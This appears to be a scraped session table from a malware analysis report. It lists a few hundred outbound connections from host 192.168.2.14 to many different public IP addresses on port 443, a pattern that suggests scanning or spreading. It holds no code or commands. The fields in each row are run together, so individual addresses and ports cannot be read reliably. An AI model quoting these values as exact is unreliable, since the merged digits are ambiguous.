                                                        16703192.168.2.1437030197.152.171.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16704192.168.2.1450454190.245.187.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16705192.168.2.1459568150.236.177.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16706192.168.2.1433390129.124.28.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16707192.168.2.1453470205.160.225.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16708192.168.2.1453876164.101.61.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16709192.168.2.1459122153.18.198.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16710192.168.2.144339896.69.188.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16711192.168.2.144079447.49.8.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16712192.168.2.1445172223.99.91.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16713192.168.2.1445892198.27.130.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16714192.168.2.1441276126.173.17.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16715192.168.2.144809893.110.110.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16716192.168.2.144224437.95.33.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16717192.168.2.143909649.160.226.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16718192.168.2.1458072161.10.141.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16719192.168.2.146056294.154.147.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16720192.168.2.1446274142.99.99.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16721192.168.2.1439376168.149.90.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16722192.168.2.1446290143.251.20.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16723192.168.2.1443848108.129.67.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16724192.168.2.145050438.84.102.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16725192.168.2.1444342160.68.117.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16726192.168.2.143425877.206.248.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16727192.168.2.145366848.223.240.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16728192.168.2.145985693.140.206.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16729192.168.2.1454592117.163.170.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16730192.168.2.143343475.173.19.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16731192.168.2.144857251.205.251.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16732192.168.2.14510529.159.228.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16733192.168.2.144441093.151.215.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16734192.168.2.1460062130.221.47.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16735192.168.2.1440054181.247.86.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16736192.168.2.1449242129.135.56.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16737192.168.2.1438240176.196.84.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16738192.168.2.145059657.226.108.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16739192.168.2.144047494.220.239.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16740192.168.2.1441308123.205.215.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16741192.168.2.145067486.100.144.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16742192.168.2.144184657.117.220.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16743192.168.2.1435594162.50.246.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16744192.168.2.1445920161.60.85.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16745192.168.2.145874841.132.212.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16746192.168.2.1453566205.80.195.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16747192.168.2.1447254122.99.232.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16748192.168.2.1450268208.174.161.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16749192.168.2.14441069.125.139.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16750192.168.2.1437952113.0.70.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16751192.168.2.14560369.232.188.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16752192.168.2.1458742139.87.81.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16753192.168.2.1458842134.119.234.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16754192.168.2.145078014.130.103.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16755192.168.2.1460666193.85.0.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16756192.168.2.143752852.149.163.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16757192.168.2.1450770216.117.192.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16758192.168.2.144097067.81.106.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16759192.168.2.144961824.37.121.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16760192.168.2.1455504213.42.109.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16761192.168.2.1459932165.173.12.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16762192.168.2.1444740187.165.42.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16763192.168.2.144428070.209.27.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16764192.168.2.1456472187.72.94.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16765192.168.2.1439640162.175.86.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16766192.168.2.144905868.59.80.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16767192.168.2.1444826105.68.94.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16768192.168.2.145081084.14.123.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16769192.168.2.145011075.140.62.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16770192.168.2.144148846.13.217.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16771192.168.2.144606074.236.71.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16772192.168.2.1444040172.197.60.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16773192.168.2.14515001.239.218.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16774192.168.2.143359274.197.120.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16775192.168.2.1441612162.219.233.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16776192.168.2.1452076167.177.84.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16777192.168.2.1451464152.88.171.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16778192.168.2.143846687.82.226.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16779192.168.2.1433390118.148.152.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16780192.168.2.1456074176.100.151.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16781192.168.2.1435372134.72.187.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16782192.168.2.1438728146.156.220.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16783192.168.2.143453447.126.233.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16784192.168.2.145640232.125.83.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16785192.168.2.1452512112.189.134.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16786192.168.2.1437366169.163.198.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16787192.168.2.1451232198.0.95.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16788192.168.2.145100249.94.168.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16789192.168.2.1447900134.250.200.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16790192.168.2.144082218.112.130.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16791192.168.2.143663085.151.2.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16792192.168.2.1437250135.45.232.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16793192.168.2.1442120197.238.25.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16794192.168.2.145113449.219.67.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16795192.168.2.1442268194.235.48.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16796192.168.2.1448432157.176.137.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16797192.168.2.143788625.229.57.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16798192.168.2.1440862208.211.75.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16799192.168.2.1443328219.243.4.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16800192.168.2.1454472199.56.166.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16801192.168.2.1452464107.205.85.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16802192.168.2.1438626162.48.97.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16803192.168.2.144583497.107.140.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16804192.168.2.1454892105.53.223.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16805192.168.2.143967085.139.60.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16806192.168.2.1445308172.217.120.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16807192.168.2.145281458.5.227.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16808192.168.2.1442266100.225.154.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16809192.168.2.145454677.210.83.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16810192.168.2.1434612154.65.0.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16811192.168.2.143859692.190.54.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16812192.168.2.143823052.71.162.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16813192.168.2.1457788143.140.65.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16814192.168.2.1460892134.219.11.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16815192.168.2.1456900174.68.18.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16816192.168.2.1456162111.169.211.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16817192.168.2.1447960132.121.148.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16818192.168.2.1435412124.112.95.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16819192.168.2.1450036106.72.190.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16820192.168.2.1459526134.144.187.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16821192.168.2.1440286125.37.67.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16822192.168.2.1456414123.86.66.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16823192.168.2.1448378121.35.78.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16824192.168.2.144620054.66.76.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16825192.168.2.1457446188.50.176.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16826192.168.2.14556184.62.189.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16827192.168.2.1456714219.7.226.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16828192.168.2.1453272203.44.46.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16829192.168.2.144177242.148.44.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16830192.168.2.1447078169.148.49.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16831192.168.2.144311291.143.109.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16832192.168.2.144197812.172.171.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16833192.168.2.1454226161.0.208.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16834192.168.2.145879245.38.196.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16835192.168.2.144465035.64.206.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16836192.168.2.143423869.254.243.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16837192.168.2.146058638.9.105.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16838192.168.2.1434320120.169.243.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16839192.168.2.1450562130.95.16.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16840192.168.2.145789836.120.117.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16841192.168.2.1444286116.63.124.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16842192.168.2.1456354205.53.179.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16843192.168.2.1456806129.70.193.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16844192.168.2.145579067.82.58.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16845192.168.2.1433326192.248.216.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16846192.168.2.1439372100.40.200.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16847192.168.2.1445780105.185.158.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16848192.168.2.145433825.240.213.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16849192.168.2.1456724220.190.0.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16850192.168.2.144072857.21.125.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16851192.168.2.145137813.56.82.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16852192.168.2.144591243.18.140.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16853192.168.2.1451952159.66.211.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16854192.168.2.1445118173.201.65.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16855192.168.2.144230640.233.159.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16856192.168.2.1441590144.42.93.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16857192.168.2.1434232132.219.35.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16858192.168.2.1439946218.45.148.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16859192.168.2.1436754184.120.221.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16860192.168.2.144706661.56.168.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16861192.168.2.1459078133.124.3.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16862192.168.2.143555460.10.74.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16863192.168.2.1437640211.207.45.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16864192.168.2.145823492.175.83.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16865192.168.2.14375865.77.207.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16866192.168.2.1449710154.128.228.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16867192.168.2.1446900106.74.221.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16868192.168.2.143507641.155.194.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16869192.168.2.1437240181.194.12.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16870192.168.2.1447434207.240.17.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16871192.168.2.1451998190.4.0.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16872192.168.2.1441776155.198.30.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16873192.168.2.145065882.238.151.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16874192.168.2.145307439.191.214.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16875192.168.2.1458820216.168.58.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16876192.168.2.1451880184.84.80.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16877192.168.2.1447794135.18.109.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16878192.168.2.1443694213.150.17.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16879192.168.2.146065647.60.141.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16880192.168.2.144894832.3.9.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16881192.168.2.1455570186.187.171.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16882192.168.2.1458154143.231.178.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16883192.168.2.1444298217.170.112.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16884192.168.2.1438474113.192.62.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16885192.168.2.1448496175.202.19.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16886192.168.2.145659227.185.152.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16887192.168.2.1452430149.66.13.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16888192.168.2.1434782136.233.192.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16889192.168.2.1445074152.141.149.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16890192.168.2.1457236126.103.103.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16891192.168.2.145454218.57.4.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16892192.168.2.144850019.236.201.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16893192.168.2.1459516184.186.60.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16894192.168.2.1433728222.204.85.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16895192.168.2.1433408203.91.116.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16896192.168.2.1453132158.56.78.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16897192.168.2.1439938115.41.164.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16898192.168.2.144396442.183.175.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16899192.168.2.1446760210.131.5.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16900192.168.2.1453124192.200.40.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16901192.168.2.143333665.203.155.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16902192.168.2.143925435.182.38.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16903192.168.2.145438465.199.149.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16904192.168.2.145021483.230.96.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16905192.168.2.1447524103.225.154.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16906192.168.2.145801057.59.220.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16907192.168.2.143682849.113.110.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16908192.168.2.145669286.170.234.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16909192.168.2.1437990113.75.41.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16910192.168.2.144067678.39.191.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16911192.168.2.1437488134.252.246.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16912192.168.2.1451496182.88.44.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16913192.168.2.145210884.157.252.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16914192.168.2.144502276.0.190.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16915192.168.2.14467384.70.184.170443
